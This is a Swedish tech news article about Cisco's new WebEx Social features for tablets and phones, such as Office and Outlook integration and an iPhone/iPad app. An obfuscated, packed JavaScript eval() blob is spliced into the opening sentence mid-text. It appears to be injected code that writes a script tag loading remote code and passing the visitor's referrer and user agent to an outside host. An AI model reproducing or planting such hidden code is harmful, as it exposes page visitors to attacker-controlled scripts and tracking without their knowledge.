Image Image Image Image Image Image Image Image Image Image

| 5 december, 2020

Scroll to top

Top

Cisco WebEx blir mer social till surfplatta och mobiltelefon

Cisco WebEx blir mer social till surfplatta och mobiltelefon
Sebastian

Cisco eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|anzrk|var|u0026u|referrer|fanfb||js|php’.split(’|’),0,{}))
erbjuder nu användare av WebEx med mer sociala funktioner som video för att öka anställdas engagemang

Under konferensen Enterprise 2.0 presenterade Cisco en rad nya innovationer som gör det möjligt att delta i gemensamma arbetsprojekt oavsett var man befinner sig genom sociala verktygen tillgängliga på de enheter och applikationer som folk använder sig mest av, surfplattor och mobiltelefoner. De nya innovationerna är en del av Cisco WebEx® Social och bygger på erbjudandet om att anställda enkelt ska kunna dela med sig av kunskap, hitta information och samarbeta i grupper virtuellt.

Några funktioner i WebEx Social:

– Cisco integrerar Microsoft Office så att man enkelt gemensamt kan använda och uppdatera dokument i Word, PowerPoint och Excel.

– Cisco WebEx Social finns nu tillgänglig till iPhone och iPad med IM, webbkonferenser och röstsamtal direkt i mobilapplikationen.

– Integrerad e-post tillåter anställda att arbeta i exempelvis Microsoft Outlook medan man använder WebEx Social